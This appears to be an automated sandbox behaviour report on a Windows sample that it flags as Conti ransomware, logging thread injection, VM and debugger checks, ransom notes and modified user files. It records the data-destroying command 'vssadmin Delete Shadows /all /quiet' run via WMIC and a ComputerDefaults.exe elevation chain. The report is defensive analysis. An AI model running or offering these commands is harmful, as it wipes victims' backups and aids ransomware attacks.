Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe Jump to behavior
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' Jump to behavior
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\taskhostw.exe Process created: unknown unknown
Source: C:\Windows\System32\taskhostw.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\ComputerDefaults.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations Jump to behavior
Source: 7906dc47_by_Libranalysis.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: 7906dc47_by_Libranalysis.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572A7A push rcx; retf 2_2_00007FF6AB572AA9
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572880 push rbp; iretd 2_2_00007FF6AB572881
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB573AFE pushfq ; ret 2_2_00007FF6AB573AFF
Source: initial sample Static PE information: section name: .text entropy: 7.62659115899

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Downloads\readme.txt Jump to behavior
Source: C:\Windows\System32\sihost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt Jump to behavior
Source: C:\Windows\System32\taskhostw.exe File created: C:\Users\Public\readme.txt

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\ComputerDefaults.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc 2_2_00007FF6AB572327
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058206B2 FindFirstFileExW, 2_2_000001BB058206B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW, 2_2_000001BB058906B2
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C4106B2 FindFirstFileExW, 3_2_0000024D2C4106B2
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF06B2 FindFirstFileExW, 4_2_0000024843FF06B2
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A06B2 FindFirstFileExW, 11_2_0000020A025A06B2
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB06B2 FindFirstFileExW, 30_2_00000255F9EB06B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW, 2_2_000001BB0582016A
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp Binary or memory string: 1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: ComputerDefaults.exe, 00000021.00000002.266558256.000001E991F33000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\8
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: /Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc 2_2_00007FF6AB572327

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\sihost.exe EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\svchost.exe EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\svchost.exe EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\taskhostw.exe EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\sihost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\taskhostw.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2952 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2996 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3020 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2736 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3176 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3088 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3756 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3688 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4396 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4484 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3200 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5588 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5648 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5796 Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 6076 Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: 2952 1BB026C0AB0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe Jump to behavior
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' Jump to behavior
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\sihost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\taskhostw.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\sihost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 419877 Sample: 7906dc47_by_Libranalysis Startdate: 21/05/2021 Architecture: WINDOWS Score: 100 82 Multi AV Scanner detection for submitted file 2->82 84 Found ransom note / readme 2->84 86 Yara detected Conti ransomware 2->86 88 6 other signatures 2->88 8 7906dc47_by_Libranalysis.exe 1 2->8         started        11 cmd.exe 1 2->11         started        13 cmd.exe 1 2->13         started        15 2 other processes 2->15 process3 signatures4 96 Sets debug register (to hijack the execution of another thread) 8->96 98 Modifies the context of a thread in another process (thread injection) 8->98 100 Maps a DLL or memory area into another process 8->100 102 Creates a thread in another existing process (thread injection) 8->102 17 sihost.exe 2 12 8->17 injected 21 taskhostw.exe 8->21 injected 23 svchost.exe 1 8->23 injected 25 svchost.exe 1 8->25 injected 27 ComputerDefaults.exe 1 15 11->27         started        29 conhost.exe 11->29         started        31 ComputerDefaults.exe 12 13->31         started        33 conhost.exe 13->33         started        35 4 other processes 15->35 process5 file6 72 C:\Users\user\Desktop\...\SUAVTZKNFL.pdf, data 17->72 dropped 74 C:\Users\user\Desktop\LSBIHQFDVT.docx, data 17->74 dropped 76 C:\Users\user\Desktop\...behaviorgraphAOBCVIQIJ.docx, data 17->76 dropped 80 2 other files (none is malicious) 17->80 dropped 90 Modifies existing user documents (likely ransomware behavior) 17->90 37 cmd.exe 1 17->37         started        39 cmd.exe 1 17->39         started        78 C:\Users\Public\readme.txt, ASCII 21->78 dropped 41 cmd.exe 1 23->41         started        43 cmd.exe 1 23->43         started        45 cmd.exe 25->45         started        47 cmd.exe 25->47         started        92 Creates processes via WMI 27->92 49 WMIC.exe 27->49         started        51 WMIC.exe 31->51         started        signatures7 process8 process9 53 WMIC.exe 1 37->53         started        56 conhost.exe 37->56         started        66 2 other processes 39->66 68 2 other processes 41->68 70 2 other processes 43->70 58 conhost.exe 45->58         started        60 conhost.exe 47->60         started        62 conhost.exe 49->62         started        64 conhost.exe 51->64         started        signatures10 94 Creates processes via WMI 53->94
No contacted IP infos